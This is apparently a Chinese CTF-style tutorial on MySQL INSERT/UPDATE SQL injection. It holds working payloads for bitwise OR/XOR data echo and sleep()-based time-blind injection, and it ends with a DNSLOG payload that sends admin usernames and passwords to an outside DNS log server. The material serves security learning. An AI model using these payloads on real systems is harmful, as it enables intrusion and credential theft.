0x00前言
整理一下关于Insert和Update型SQL注入的利用方式。
0x01Insert和Update型
1.有回显注入
int型注入点和字符型都采用按位或|
和按位异或^
获取数据。
如果拼接的值为0,可以采用按位或|
运算显示查询到的数据,如果拼接的值不是0(以100为例),可以采用按位异或^
运算显示运算后的数据,然后再异或一次可以恢复查询的数据。
注意查询到的数据经过hex转换,如果值大于Mysql bigint 最大值(9223372036854775807)时,获取到的数据均为9223372036854775807,此时要用substr等分段获取数据。1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79#int型按位或
mysql> insert into ctf values (0 | (select hex(database())),'0','test','0');
Query OK, 1 row affected, 1 warning (0.03 sec)
mysql> select * from ctf;
+----------+----------+-----------+------+
| userid | username | signature | mood |
+----------+----------+-----------+------+
| 74657374 | 0 | test | 0 |
+----------+----------+-----------+------+
1 row in set (0.00 sec)
mysql> select unhex(74657374);
+-----------------+
| unhex(74657374) |
+-----------------+
| test |
+-----------------+
1 row in set (0.00 sec)
#int型按位异或
mysql> insert into ctf values (100 ^ (select hex(database())),'0','test','0');
Query OK, 1 row affected, 1 warning (0.03 sec)
mysql> select * from ctf;
+----------+----------+-----------+------+
| userid | username | signature | mood |
+----------+----------+-----------+------+
| 74657338 | 0 | test | 0 |
+----------+----------+-----------+------+
1 row in set (0.00 sec)
mysql> select unhex(100^74657338);
+---------------------+
| unhex(100^74657338) |
+---------------------+
| test |
+---------------------+
1 row in set (0.00 sec)
#字符型按位或
mysql> insert into ctf values (100 ,'0'| (select hex(database())) ,'test','0');
Query OK, 1 row affected (0.02 sec)
mysql> select * from ctf;
+--------+----------+-----------+------+
| userid | username | signature | mood |
+--------+----------+-----------+------+
| 100 | 74657374 | test | 0 |
+--------+----------+-----------+------+
1 row in set (0.00 sec)
mysql> select unhex(74657374);
+-----------------+
| unhex(74657374) |
+-----------------+
| test |
+-----------------+
1 row in set (0.00 sec)
#字符型按位异或
mysql> insert into ctf values (100 ,'100' ^ (select hex(database())) ,'test','0');
Query OK, 1 row affected (0.03 sec)
mysql> select * from ctf;
+--------+----------+-----------+------+
| userid | username | signature | mood |
+--------+----------+-----------+------+
| 100 | 74657338 | test | 0 |
+--------+----------+-----------+------+
1 row in set (0.00 sec)
mysql> select unhex('100'^74657338);
+-----------------------+
| unhex('100'^74657338) |
+-----------------------+
| test |
+-----------------------+
1 row in set (0.00 sec)
同理可以使用其他可进行逆运算的运算符(+,-,*,/
)获取查询数据,由于逻辑运算后的结果只有1或者0,所以or,||,xor,&&,and
直接不能用于数据回显的注入情况。
2.时间盲注
int型时间盲注点
可以使用 and,&&,or,||,xor
拼接sql代码。如下可以看出and,&&前面的int值不能为0;or,||前面的int值不能为1;而xor对前面int的值没有要求,所以推荐使用xor1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17mysql> insert into ctf values (0 && sleep(2),'test','test','0');
Query OK, 1 row affected (0.03 sec)
mysql> insert into ctf values (1 && sleep(2),'test','test','0');
Query OK, 1 row affected (2.02 sec)
mysql> insert into ctf values (0 || sleep(2),'test','test','0');
Query OK, 1 row affected (2.03 sec)
mysql> insert into ctf values (1 || sleep(2),'test','test','0');
Query OK, 1 row affected (0.02 sec)
mysql> insert into ctf values (0 xor sleep(2),'test','test','0');
Query OK, 1 row affected (2.09 sec)
mysql> insert into ctf values (1 xor sleep(2),'test','test','0');
Query OK, 1 row affected (2.01 sec)
int型注入点,也可以使用四则运算:+,-,*,/
。
1 | mysql> insert into ctf values (0+sleep(2),'test','test','0'); |
此外还能使用位运算&,|
1
2
3
4
5mysql> insert into ctf values (0&sleep(2),'test','test','0');
Query OK, 1 row affected (2.02 sec)
mysql> insert into ctf values (0|sleep(2),'test','test','0');
Query OK, 1 row affected (2.02 sec)
字符型时间盲注点
可以使用:or,||,xor,+,-,*,/,|,&
,字符型在进行逻辑运算时会当做0,不能使用&&,and
。
1 | mysql> insert into ctf values (0,'test' and sleep(2),'test','0'); |
DNSLOG
1 | 1' xor load_file(concat('\\\\\\\\',(select CONCAT_WS('_',admin_id,admin_pass) from met_admin_table where id=1),'.dnslog服务器地址\\abc'))-- -' |